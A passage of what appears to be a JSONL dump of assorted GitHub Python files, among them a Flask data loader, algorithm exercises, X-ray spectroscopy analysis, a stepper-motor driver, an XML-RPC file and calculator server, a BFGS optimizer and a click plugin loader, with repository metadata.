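high = np.array([0.90, 0.80, 0.85, 0.95])
rest = np.array([0.20, 0.30, 0.25, 0.40])
alt = "greater" if np.mean(high) > np.mean(rest) else "less"
stat, pval = mannwhitneyu(high, rest, use_continuity=False, alternative=alt)
# A small pval supports higher dependency scores in the high-expression group.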
db.session.add(m.Weekday(short_name=wd, ru_name=name))\n\n # Загружаем цели\n for g in data.goals:\n db.session.add(m.Goal(**g))\n\n # Загружаем преподавателей\n if m.Teacher.query.count() == 0:\n goals = m.Goal.query.all()\n for teacher in data.teachers:\n t = m.Teacher(\n id=teacher['id'],\n name=teacher['name'],\n about=teacher['about'],\n rating=teacher['rating'],\n picture=teacher['picture'],\n price=teacher['price'],\n free=teacher['free']\n )\n # Дополняем связи с целями\n for g in goals:\n if g.name in teacher['goals']:\n t.goals.append(g)\n\n db.session.add(t)\n db.session.commit()\n print('initial data loaded')\n except:\n db.session.rollback()\n print('data already exists')\n","repo_name":"IvanRychkov/stepik_teachers","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22645865456","text":"import json\nimport os\nfrom loguru import logger\nfrom performance import Performance\n\n\ndef load_config(file: str) -> list[dict]:\n with open(file, \"r\") as f:\n data: dict = json.load(f)\n logger.success(f\"Load config: {data['name']} - v{data['version']}\")\n return data.get(\"data\")\n\n\nif __name__ == \"__main__\":\n # main_path = sys.executable # for pyinstaller\n # main_path = \".\" # for pyinstaller\n main_path = __file__\n config_file = os.path.join(os.path.dirname(main_path), \"perf.json\")\n config = load_config(config_file)\n for cfg in config:\n file: str = os.path.join(os.path.dirname(main_path), cfg.get(\"source\"))\n per_type: str = cfg.get(\"type\")\n processes: list[str] = cfg.get(\"processes\")\n title: str = cfg.get(\"title\")\n mp = Performance(per_type)\n if cfg.get(\"enabled\"):\n chunks = mp.content_splits(file, mp.seperator_pattern)\n for process in processes:\n y_data = mp.data_extraction(chunks, mp.match_pattern(process))\n mp.save_plot(\n y_data,\n y_label=per_type,\n title=f\"{title}_{process.replace('/', '_')}\",\n )\n else:\n logger.warning(f\"{per_type} is disabled!\")\n","repo_name":"maple24/vta","sub_path":"vta/tasks/performance/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32284243055","text":"import sys\ninput = sys.stdin.readline\nfrom collections import deque\n\ndef bfs(idx):\n visited=[-1]*(n+1)\n visited[idx]=0\n q=deque([idx])\n while q:\n now = q.popleft()\n for _next in graph[now]:\n if visited[_next]==-1:\n visited[_next]=visited[now]+1\n q.append(_next)\n node=0\n cnt=0\n for i in range(1,n+1):\n if cnt< visited[i]:\n cnt = visited[i]\n node=i\n return node,cnt\n\nn= int(input())\ngraph= [[] for _ in range(n+1)]\n\nfor _ in range(n-1):\n u,v = map(int,input().split())\n graph[u].append(v)\n graph[v].append(u)\n\nfirst,firstdist= bfs(1)\nprint(first,firstdist)\nsecond,diameter=bfs(first)\nprint(second,diameter)\nprint((diameter+1)//2)","repo_name":"kimth007kim/python_algorithm","sub_path":"코테스터디/2022/0402/12896 스크루지 민호 bfs 해설.py","file_name":"12896 스크루지 민호 bfs 해설.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70726642681","text":"# Definition for a Node.\nclass Node:\n def __init__(self, x, next=None, random=None):\n self.val = int(x)\n self.next = next\n self.random = random\n\nclass Solution(object):\n def __init__(self):\n self.visited = {}\n\n def 
copyRandomList(self, head):\n \"\"\"\n :type head: Node\n :rtype: Node\n https://leetcode.com/problems/copy-list-with-random-pointer/solutions/3205736/138-solution-with-step-by-step-explanation/\n \"\"\"\n if not head:\n return None\n if head in self.visited:\n return self.visited[head]\n # Create a new node with the same value as the original node\n node = Node(head.val,None,None)\n self.visited[head]=node \n\n node.next = self.copyRandomList(head.next)\n node.random = self.copyRandomList(head.random)\n return node \n \n\n\n\n\n\n\nhead = [[7,None],[13,0],[11,4],[10,2],[1,0]]\nobj = Solution().copyRandomList(head)\n\n","repo_name":"danyow-cheung/Algorithms_python","sub_path":"leetcode/linkedlist_138.py","file_name":"linkedlist_138.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20969236870","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.optimize import curve_fit\nimport pandas as pd\nfrom scipy import integrate\n\n################# FUNCTIONS ##################\ndef reader(name, beta_min, beta_max, delta_ang, delta_t):\n init_num = 17\n count_num = int((beta_max-beta_min)/delta_ang) + 17\n\n with open(name, \"r\", encoding='utf-8', errors='ignore') as file:\n counts = file.readlines()\n \n counts = counts[init_num:count_num]\n counts[0] = counts[0].split()[1]\n \n points = []\n #ct, ang = [], []\n for ii in range(len(counts)):\n angl = beta_min + ii*delta_ang\n pp = [float(\"{0:.1f}\".format(angl)), float(counts[ii])]\n #ct.append(float(counts[ii]))\n #ang.append(float(\"{0:.1f}\".format(angl)))\n points.append(pp)\n return np.array(points)\n\ndef plotter(array, Title = \"Gráfico\", clr = 'dodgerblue'):\n plt.plot(array[:,0], array[:,1], color = clr)\n plt.grid()\n plt.title(Title)\n plt.show()\n\ndef plotter_2(array1, array2, Title = \"Gráfico\"):\n plt.plot(array1[:,0], array1[:,1], label=\"Medição 1\")\n plt.plot(array2[:,0], array2[:,1], label=\"Medição 2\")\n plt.grid()\n plt.legend()\n plt.title(Title)\n plt.show()\n\ndef gaussian(x, amplitude, mean, stddev, cte = 0):\n return amplitude * np.exp(-((x - mean) ** 2) / (2 * stddev ** 2)) + cte\n\ndef double_gaussian(x, amplitude1, mean1, stddev1, amplitude2, mean2, stddev2, cte = 0):\n return gaussian(x, amplitude1, mean1, stddev1) + gaussian(x, amplitude2, mean2, stddev2) + cte\n\ndef d_calculator(n, lambda_, teta):\n return n*lambda_/(2*np.sin(np.deg2rad(teta)))\n\ndef Potencia_Resolutiva(teta, delta_teta):\n return np.tan(np.deg2rad(teta))/delta_teta\n\n######################################################################################\n##################################### MAIN ###########################################\n######################################################################################\n### Constants\nlambda_K_alpha = 71.080 # pm\nlambda_K_beta = 63.095 # pm\n\n### Reading data\n\"\"\"\nler os ficheiros dos cristais com I = 0.1mA + NaCl com I = 0.1mA + do fundo\n\"\"\"\n\n\"\"\"\nler files para ref relativa \n\"\"\"\nNaCl_spectrum = reader(\"dados_ref/NaCl_spectrum.xry\", 2.5, 60, 0.2, 1)\nSi_spectrum = reader(\"dados_ref/Si_spectrum.xry\", 2.5, 60, 0.2, 1)\nLiF_spectrum = reader(\"dados_ref/LiF_spectrum.xry\", 5, 40, 0.1, 1)\nNaCl_X_spectrum = reader(\"dados_ref/NaCl_spectrum_x.xry\", 2.5, 45, 0.1, 1)\nNaCl_O_spectrum = reader(\"dados_ref/NaCl_spectrum_O.xry\", 2.5, 45, 0.1, 4)\nAl_spectrum_mau = reader(\"dados_ref/Al_Spectrum_mau.xry\", 2.5, 45, 0.1, 1)\nHOPG_spectrum = 
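# Editor's note (added): the driver at the end of the record above passes a
# plain list to copyRandomList, which raises TypeError (lists cannot be dict
# keys in self.visited). A sketch of a driver that builds real Node objects
# from the LeetCode-style input, reusing the record's Node and Solution:
def build_random_list(pairs):
    nodes = [Node(val) for val, _ in pairs]
    for i, (_, rand) in enumerate(pairs):
        nodes[i].next = nodes[i + 1] if i + 1 < len(nodes) else None
        nodes[i].random = nodes[rand] if rand is not None else None
    return nodes[0] if nodes else None

head = build_random_list([[7, None], [13, 0], [11, 4], [10, 2], [1, 0]])
copied = Solution().copyRandomList(head)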
reader(\"dados_ref/HOPG_Spectrum.xry\", 2.5, 45, 0.1, 1)\nSafira_spectrum = reader(\"dados_ref/Safira_spectrum.xry\", 10, 45, 0.1, 1)\nspectrums = [NaCl_spectrum, Si_spectrum, LiF_spectrum, NaCl_X_spectrum, NaCl_O_spectrum, Al_spectrum_mau, HOPG_spectrum, Safira_spectrum]\n\n#Selecionar valores so a partir de 10.1 (podemos mudar este valor)\nnew_specs = []\nfor spec in spectrums:\n for i in range(len(spec)):\n if spec[i][0] == 10.1:\n break\n new_spec = spec[i+1:]\n new_specs.append(new_spec)\n\nnew_new_specs = []\n\n#Selecionar valores so até 39.9\nfor s in new_specs:\n for i in range(len(spec)):\n if s[i][0] == 39.9:\n break\n new_new_spec = s[:i+2]\n new_new_specs.append(new_new_spec)\n\n#transformar esta merda em numpy arrays como deve ser \nx_piqi= np.array(new_new_specs[0])[:,0]\nx_grande = np.array(new_new_specs[7])[:,0]\ny_specs = []\nfor i in range(len(new_new_specs)): y_specs.append(np.array(new_new_specs[i])[:,1])\n\nresults = []\nfor spec in y_specs:\n if len(spec) == len(x_piqi):\n results.append(integrate.simps(spec, x_piqi))\n elif len(spec) == len(x_grande):\n results.append(integrate.simps(spec, x_grande))\n else:\n raise ValueError('O comprimento do array não é igual ao do x')\n\nrefletividades_relativas = []\n\nfor res in results: refletividades_relativas.append(res/results[0])\n\nprint('Refletividade Relativa Si: ', refletividades_relativas[1])\nprint('Refletividade Relativa LiF: ', refletividades_relativas[2])\nprint('Refletividade Relativa NaCl_X: ', refletividades_relativas[3])\nprint('Refletividade Relativa NaCl_O: ', refletividades_relativas[4])\nprint('Refletividade Relativa Al: ', refletividades_relativas[5])\nprint('Refletividade Relativa HOPG: ', refletividades_relativas[6])\nprint('Refletividade Relativa Safira: ', refletividades_relativas[7])\n\n\n\n### Plotting data\n\"\"\"se quiseres\"\"\"\n\n##### Calculate the absolute reflectivity of NaCl\n\"\"\"\nDividir as counts de NaCl pelas do fundo\n\"\"\"\nnacl_001 = reader(\"dados_ref/NaCl_0.01mA.xry\", 5, 9, 0.1, 5)\nnada_001 = reader(\"dados_ref/Nada_0.01mA.xry\", -2.5, 2.5, 0.1, 5)\n\nnacl_002 = reader(\"dados_ref/NaCl_0.02mA.xry\", 5, 9, 0.1, 5)\nnada_002 = reader(\"dados_ref/Nada_0.02mA.xry\", -2.5, 2.5, 0.1, 5)\n\ncounts_nacl_001 = 0\ncounts_nacl_002 = 0\ncounts_nada_001 = 0\ncounts_nada_002 = 0\n\nfor i in range(1, len(nacl_001)):\n counts_nacl_001 += nacl_001[i][1]\n counts_nada_001 += nada_001[i][1]\n counts_nacl_002 += nacl_002[i][1]\n counts_nada_002 += nada_002[i][1]\n\nreflec_abs_nacl_001 = counts_nacl_001/counts_nada_001\nreflec_abs_nacl_002 = counts_nacl_002/counts_nada_002\n\nprint(reflec_abs_nacl_001)\nprint(reflec_abs_nacl_002)\n\n\n\n\n\n##### Calculate the relative reflectivity of crystals\n\"\"\"Dividir as counts dos cristais pelas do NaCl 1.0mA\"\"\" \n\n##### Calculate the absolute reflectivity of crystals\n\"\"\"Multiplicar as reflectividades relativas dos cristais pela reflectividade absoluta do NaCl\"\"\"\n\n\n","repo_name":"NunoGandum19/LFEA-II","sub_path":"Analise/Espetroscopia_rx/refletividade.py","file_name":"refletividade.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30613696652","text":"#Code to interface with DRV8821 and two stepper motors\n\nimport wiringpi\n\n\n#Pin number listing\n\nPWMA = 7 #Uses actual pin numbers, not GPIO number\nPWMB = 13\nABRST = 33\nABDIR = 35\nCDRST = 37\nCDDIR = 15\n\n# Static Variables\nOUTPUT = 1\nHIGH = 1\nLOW = 
0\n\nwiringpi.wiringPiSetup()\nwiringpi.pinMode(PWMA,OUTPUT)\nwiringpi.pinMode(PWMB,OUTPUT)\nwiringpi.pinMode(ABRST,OUTPUT)\nwiringpi.pinMode(ABDIR,OUTPUT)\nwiringpi.pinMode(CDRST,OUTPUT)\nwiringpi.pinMode(CDDIR,OUTPUT)\n\n#for time in range(0,4):\n#\tfor brightness in range(0,100): # Going from 0 to 100 will give us full off to full on\n#\t\twiringpi.softPwmWrite(PIN_TO_PWM,brightness) # Change PWM duty cycle\n#\t\twiringpi.delay(10) # Delay for 0.2 seconds\n#\tfor brightness in reversed(range(0,100)):\n#\t\twiringpi.softPwmWrite(PIN_TO_PWM,brightness)\n#\t\twiringpi.delay(10)\n\n\npwmacount= int(raw_input(\"Enter number of PWM pulses for pin 7:\\n\"))\n\n#Inputs for later\nMotorABDir = 1\nMotorCDDir = 0\n\nwiringpi.digitalWrite(ABRST,HIGH) #Enable motor 1\nwiringpi.digitalWrite(CDRST,HIGH) #Enable motor 2\nwiringpi.digitalWrite(ABDIR,MotorABDir) #Set motor 1 (A/B) direction\nwiringpi.digitalWrite(CDDIR,MotorCDDir) #Set motor 2 (C/D) direction\n\n\n\nfor pulses in range(0,pwmacount):\n\n\twiringpi.digitalWrite(PWMA,HIGH)\n\twiringpi.delayMicroseconds(500) #f = 900Hz (pulses per second). T = 1/f. Delay = T/2 = 555.56us> Modified based on scope\n\twiringpi.digitalWrite(PWMA,LOW)\n\twiringpi.delayMicroseconds(500)\n\t\n\t#wiringpi.digitalWrite(PWMB,HIGH)\n\t#wiringpi.delayMicroseconds(500) #f = 900Hz (pulses per second). T = 1/f. Delay = T/2 = 555.56us> Modified based on scope\n\t#wiringpi.digitalWrite(PWMB,LOW)\n\t#wiringpi.delayMicroseconds(500)\n\nwiringpi.digitalWrite(ABRST,LOW) #Disable motor 1\nwiringpi.digitalWrite(CDRST,LOW) #Disable motor 2\n","repo_name":"nabeelfkhan/RpiProjects","sub_path":"examples/stepper.py","file_name":"stepper.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}\n{"seq_id":"21746125097","text":"# Joe Degere\n# 11/11/19\n# Homework\n\n\nclass Vehicle:\n def __init__(self, name, brand, shift, year ):\n self.name = name\n self.brand = brand\n self.shift = shift\n self.year = year\n\n def description(self):\n print(f\"I'm gonna give you a tour of this vehicle: It is a {self.name} made in {self.year}.\")\n print(f\"This {self.name} is a {self.shift} just to be aware.\")\n print(f\"The car brand is {self.brand} and the year is {self.year}\")\n\n","repo_name":"degerej/car","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}\n{"seq_id":"702416413","text":"menu = {\n \"Baja Taco\": 4.00,\n \"Burrito\": 7.50,\n \"Bowl\": 8.50,\n \"Nachos\": 11.00,\n \"Quesadilla\": 8.50,\n \"Super Burrito\": 8.50,\n \"Super Quesadilla\": 9.50,\n \"Taco\": 3.00,\n \"Tortilla Salad\": 8.00\n}\nbill = 0\nwhile True:\n try:\n order = input(\"Item: \").title()\n if order in menu:\n bill += menu[order]\n print(\"Total: $%0.2f\" % bill)\n else:\n continue\n except EOFError:\n break\n","repo_name":"BurakAhmet/cs50p","sub_path":"Problem Set 3/taqueria.py","file_name":"taqueria.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}\n{"seq_id":"15245495154","text":"from django.urls import include, path\nfrom rest_framework_simplejwt.views import (\n    TokenObtainPairView,\n    TokenRefreshView,\n)\n# signup feature\nfrom users import views\n\n\n\nurlpatterns = [\n    path('signup/', views.Signup.as_view(),name=\"signup\"),\n    path('api/token/', views.CustomTokenObtainPairView.as_view(), name='token_obtain_pair'), # token-based login urls \n 
path('api/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n    path('follow/<int:user_id>/', views.Follow_View.as_view(), name=\"follow\"),\n    path('<int:user_id>/', views.ProfileView.as_view(), name='profile_view'),\n    # path('logout/', views.LogoutView.as_view(), name='logout'),\n    \n]\n\n","repo_name":"bm4706/777_DRF_BACK","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}\n{"seq_id":"27616907379","text":"from xmlrpc.server import SimpleXMLRPCServer\r\nimport sys\r\nimport os.path\r\n\r\n# Read command line arguments\r\nip = sys.argv[1]\r\nport = int(sys.argv[2])\r\n# Create server\r\nwith SimpleXMLRPCServer((ip, port), logRequests=False) as my_server:\r\n    my_server.register_introspection_functions()\r\n\r\n    # send\r\n    def send_file(filename, data):\r\n        if not os.path.exists('./s_files/' + filename):\r\n            my_file = open('./s_files/' + filename, 'wb')\r\n            my_file.write(data.data)\r\n            my_file.close()\r\n            print(f'{filename} saved')\r\n            return True\r\n        else:\r\n            print(f'{filename} not saved')\r\n            return False\r\n    my_server.register_function(send_file, 'send')\r\n\r\n    # list\r\n    def list_files():\r\n        return os.listdir('./s_files')\r\n    my_server.register_function(list_files, 'list')\r\n\r\n    # delete\r\n    def delete_file(filename):\r\n        if os.path.exists('./s_files/' + filename):\r\n            os.remove('./s_files/' + filename)\r\n            print(f'{filename} deleted')\r\n            return True\r\n        else:\r\n            print(f'{filename} not deleted')\r\n            return False\r\n    my_server.register_function(delete_file, 'delete')\r\n\r\n    # get\r\n    def get_file(filename):\r\n        if os.path.exists('./s_files/' + filename):\r\n            my_file = open('./s_files/' + filename, 'rb')\r\n            my_file_size = os.path.getsize('./s_files/' + filename)\r\n            print(f'File send: {filename}')\r\n            return my_file.read(my_file_size)\r\n        else:\r\n            print(f'No such file: {filename}')\r\n            return False\r\n    my_server.register_function(get_file, 'get')\r\n\r\n    # calc\r\n    def calculate(expression):\r\n        try:\r\n            operator, left, right = expression.split()\r\n            if check(left) != 'Invalid input' and check(right) != 'Invalid input':\r\n                # Left operand = int/float\r\n                left = check(left)\r\n                # Right operand = int/float\r\n                right = check(right)\r\n\r\n                if operator == '+':\r\n                    result = left + right\r\n                elif operator == '-':\r\n                    result = left - right\r\n                elif operator == '*':\r\n                    result = left * right\r\n                elif operator == '/':\r\n                    try:\r\n                        result = left / right\r\n                    except ZeroDivisionError:\r\n                        result = 'Division by 0'\r\n                elif operator == '>':\r\n                    result = left > right\r\n                elif operator == '<':\r\n                    result = left < right\r\n                elif operator == '>=':\r\n                    result = left >= right\r\n                elif operator == '<=':\r\n                    result = left <= right\r\n                else:\r\n                    result = False\r\n\r\n                # If the result = n.0 then this code makes it = n\r\n                if str(result).endswith('.0'):\r\n                    result = int(result)\r\n            else:\r\n                result = False\r\n        except Exception:\r\n            result = False\r\n\r\n        # 'is False' so that a legitimate result of 0 is not mistaken for the error sentinel (0 == False in Python)\r\n        if result is False or result == 'Division by 0':\r\n            print(f'{expression} -- not done')\r\n        else:\r\n            print(f'{expression} -- done')\r\n\r\n        return result\r\n    my_server.register_function(calculate, 'calc')\r\n\r\n    # Check whether the operand is valid:\r\n    # if it consists only of digits then int, if digits and one '.' 
then float\r\n    def check(num):\r\n        if num.isdigit():\r\n            return int(num)\r\n        elif num.find('.') == num.rfind('.') != -1:\r\n            left1, left2 = num.split('.')\r\n            if (left1 + left2).isdigit():\r\n                return float(num)\r\n            else:\r\n                return 'Invalid input'\r\n        else:\r\n            return 'Invalid input'\r\n\r\n    # main\r\n    try:\r\n        my_server.serve_forever()\r\n    except KeyboardInterrupt:\r\n        print('Server is stopping')","repo_name":"curlykorine/Distributed-and-Network-Programming","sub_path":"xmlrpcClientServer/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}\n{"seq_id":"9908906380","text":"#Thea Sitek, STKTHE002\r\n#18.05.2014\r\n#Count votes\r\n\r\n\r\nprint('Independent Electoral Commission')\r\nprint('--------------------------------')\r\n\r\n#store inputted votes\r\narray = []\r\nvote = input('Enter the names of parties (terminated by DONE): \\n')\r\nwhile vote != 'DONE':\r\n    array.append(vote)\r\n    vote = input() \r\n\r\narray.sort()\r\nlength = len(array)\r\n\r\n#if any votes\r\nif array:\r\n    \r\n    votes = [array[0]] #start value is first vote, alphabetical\r\n    amount = [1] #first vote\r\n    count = 0\r\n    \r\n    for i in range(1 , len(array)):\r\n        #if vote not equal to one already counted, store name\r\n        if array[i] != array[i-1]:\r\n            votes.append(array[i])\r\n            amount.append(1)\r\n            count += 1 \r\n        #otherwise give the existing name one extra vote\r\n        elif array[i] == array[i-1]:\r\n            amount[count] += 1 \r\n    \r\n    \r\nprint('\\nVote counts:')\r\n    \r\nif array:\r\n    #format and print\r\n    space = 8\r\n    for i in range(len(votes)):\r\n        space -= len(votes[i]) - 1 \r\n        print(votes[i], ' '*space, '-', amount[i])\r\n        space = 8\r\n\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/stkthe002/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}\n{"seq_id":"21272612472","text":"# Write a function that returns a list with the unique (non-repeating) elements.\n# Do not use set or other helper functions to obtain the unique items\n\ndef unique_tsil(numbers):\n    unique = []\n    for number in numbers:\n        if number in unique:\n            continue\n        else:\n            unique.append(number)\n    return unique\nnumbers = list(map(int, input(\"Enter the list elements: \").split()))\n\n\ndef main():\n    unique_tsil(numbers)\n    print(unique_tsil(numbers))\n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"ArtemChernyschev/CourseMC","sub_path":"Unique list.py","file_name":"Unique list.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}\n{"seq_id":"74440722361","text":"import simplejson as json\nimport urlparse\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\n\nclass RedirectPage(webapp.RequestHandler):\n    def handle(self):\n        path = self.request.path\n        if path.endswith(\"/\"):\n            path += \"index.html\"\n        self.redirect(urlparse.urljoin('https://d31nkok4v6vad6.cloudfront.net/static/', path.strip(\"/\")) +\n                      \"#\" + getattr(self, \"signed_request\", \"\"))\n\n    def post(self):\n        try:\n            signed_request = self.request.get('signed_request')\n            if signed_request:\n                _, payload = signed_request.split('.', 1)\n                self.signed_request = payload\n        except:\n            pass\n\n        self.handle()\n\n    def get(self):\n        self.handle()\n\napplication = webapp.WSGIApplication(\n 
[('/.*', RedirectPage)],\n debug=False,\n)\n\ndef main():\n run_wsgi_app(application)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tomwys/facebook-static-pages","sub_path":"redirect.py","file_name":"redirect.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"73498866039","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\nimport hashlib\n\nurl = \"https://alfred.app/workflows/\"\n\ndef get_workflows(url):\n workflows = []\n page = 0\n while True:\n print(f\"Fetching page {page+1}...\")\n try:\n response = requests.get(url)\n response.raise_for_status()\n except requests.exceptions.RequestException as e:\n print(f\"An error occurred while fetching the URL: {e}\")\n break\n\n soup = BeautifulSoup(response.text, \"html.parser\")\n workflowlist_section = soup.find(\"nav\", {\"id\": \"workflowlist\"})\n\n if workflowlist_section is None:\n break\n\n for a_tag in workflowlist_section.find_all(\"a\", href=True):\n div = a_tag.find(\"div\")\n if div is None:\n continue\n\n icon = div.find_all(\"img\")\n h2 = div.find(\"h2\")\n p = div.find(\"p\")\n\n if len(icon) == 2:\n icon = icon[1]\n else:\n icon = icon[0]\n\n icon_hash = compute_image_hash('https://alfred.app' + icon[\"src\"])\n\n if icon is None or h2 is None or p is None:\n continue\n\n href_parts = a_tag[\"href\"].split(\"/\")\n if len(href_parts) < 3:\n continue\n\n workflows.append({\n \"url\": 'https://alfred.app' + a_tag[\"href\"],\n \"icon_url\": 'https://alfred.app' + icon[\"src\"],\n 'icon_hash': icon_hash,\n \"title\": h2.text,\n \"description\": p.text,\n \"author\": href_parts[2],\n 'installation_url': 'alfred://gallery' + a_tag[\"href\"].replace(\"/workflows/\", \"/workflow/\")\n })\n\n pagination_section = soup.find(\"nav\", {\"class\": \"pagination\"})\n if pagination_section is None:\n break\n\n next_page = pagination_section.find(\"li\", {\"class\": \"pagenext\"})\n if next_page is None:\n break\n\n link = next_page.find('a')\n if link:\n url = \"https://alfred.app\" + link[\"href\"]\n else:\n break\n page += 1\n\n return workflows\n\n\ndef compute_image_hash(image_url):\n try:\n response = requests.get(image_url)\n response.raise_for_status()\n except requests.exceptions.RequestException as e:\n print(f\"An error occurred while fetching the image URL: {e}\")\n return None\n\n image_data = response.content\n sha256 = hashlib.sha256()\n sha256.update(image_data)\n\n return sha256.hexdigest()\n\ntry:\n workflows = get_workflows(url)\n with open('workflows.json', 'w') as f:\n json.dump(workflows, f, indent=4)\nexcept Exception as e:\n print(f\"An unexpected error occurred: {e}\")\n\n","repo_name":"TerminalFi/alfred-gallery-channel","sub_path":"scripts/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10030136607","text":"\n# Import required libraries\nimport os\n\n# Get desired inputs from user\nfolder_path = input(\"Enter the folder path: \")\nname_prefix = input(\"Enter the name prefix: \")\n\nall_files = os.listdir(folder_path)\nprint(\"Old Filenames:\", all_files)\n\nignore_files = [\".git\"]\n\ncount = 1\nfor file in all_files:\n if file not in ignore_files:\n file_extension = os.path.splitext(file)[1]\n new_name = name_prefix + str(count) + file_extension\n os.rename(folder_path + \"/\" + file, folder_path + \"/\" + new_name)\n count += 1\n\nall_files = 
os.listdir(folder_path)\nprint(\"New Filenames:\", all_files)\n","repo_name":"LogicDecode/python-projects-for-beginners","sub_path":"4 - Bulk Rename Files.py","file_name":"4 - Bulk Rename Files.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}\n{"seq_id":"70156543161","text":"from numpy import *\n\n\n# objective function (Rosenbrock)\ndef fun(x):\n    return 100 * (x[0, 0] ** 2 - x[1, 0]) ** 2 + (x[0, 0] - 1) ** 2\n\n\n# gradient of the objective\ndef gfun(x):\n    result = zeros((2, 1))\n    result[0, 0] = 400 * x[0, 0] * (x[0, 0] ** 2 - x[1, 0]) + 2 * (x[0, 0] - 1)\n    result[1, 0] = -200 * (x[0, 0] ** 2 - x[1, 0])\n    return result\n\n\ndef bfgs(fun, gfun, x0):\n    result = []\n    maxk = 500\n    rho = 0.55\n    sigma = 0.4\n    m = shape(x0)[0]\n    Bk = eye(m)\n    k = 0\n    while (k < maxk):\n        gk = mat(gfun(x0))  # compute the gradient\n        dk = mat(-linalg.solve(Bk, gk))\n        m = 0\n        mk = 0\n        while (m < 20):  # Armijo backtracking line search\n            newf = fun(x0 + rho ** m * dk)\n            oldf = fun(x0)\n            if (newf < oldf + sigma * (rho ** m) * (gk.T * dk)[0, 0]):\n                mk = m\n                break\n            m = m + 1\n\n        # BFGS update of Bk\n        x = x0 + rho ** mk * dk\n        sk = x - x0\n        yk = gfun(x) - gk\n        if (yk.T * sk > 0):\n            Bk = Bk - (Bk * sk * sk.T * Bk) / (sk.T * Bk * sk) + (yk * yk.T) / (yk.T * sk)\n\n        k = k + 1\n        x0 = x\n        result.append(fun(x0))\n\n    return result\n\n\nimport matplotlib.pyplot as plt\n\nx0 = mat([[-1.2], [1]])\nresult = bfgs(fun, gfun, x0)\n\nn = len(result)\nax = plt.figure().add_subplot(111)\nx = arange(0, n, 1)\ny = result\nax.plot(x, y)\n\nplt.show()","repo_name":"Baylor96/Python","sub_path":"Numpy and Pandas package/BFGS.py","file_name":"BFGS.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}\n{"seq_id":"16965424736","text":"import click\nimport os\nfrom mymodule import mkdirs\n\nplugin_folder = os.path.join(os.path.dirname(__file__), 'plugins')\nmkdirs(plugin_folder)\n\ndef list_plugins(rv=None):\n    # avoid a shared mutable default argument across calls\n    if rv is None:\n        rv = []\n    for filename in os.listdir(plugin_folder):\n        if filename.endswith('.py'):\n            temp = filename[:-3]\n            if temp not in rv:\n                rv.append(temp)\n    return rv\n\nclass MyCLI(click.MultiCommand):\n    \"\"\"\n    lazy load of sub commands from commands folder. \n    \"\"\"\n    commandList = {}\n    def list_commands(self, ctx):\n        rv = list(self.commandList.keys())\n        rv = list_plugins(rv)\n        rv.sort()\n        return rv\n\n    def get_command(self, ctx, name):\n        if name in self.commandList:\n            return self.commandList[name]\n        fn = os.path.join(plugin_folder, name + '.py')\n        ns = {'__file__':fn}\n        if os.path.isfile(fn):\n            with open(fn) as f:\n                # code = compile(f.read(), fn, 'exec')\n                exec(f.read(), ns, ns)\n            return ns['cli']\n        else:\n            return None\n\n    def add_command(self, cmd, name=None):\n        \"\"\"Registers another :class:`Command` with this group. If the name\n        is not provided, the name of the command is used.\n        \"\"\"\n        name = name or cmd.name\n        if name is None:\n            raise TypeError(\"Command has no name.\")\n        if name in self.list_commands(1):\n            raise RuntimeError(f'Command {name} already exists.')\n        self.commandList[name] = cmd\n\n    def command(self, *args, **kwargs):\n        \"\"\"A shortcut decorator for declaring and attaching a command to\n        the group. 
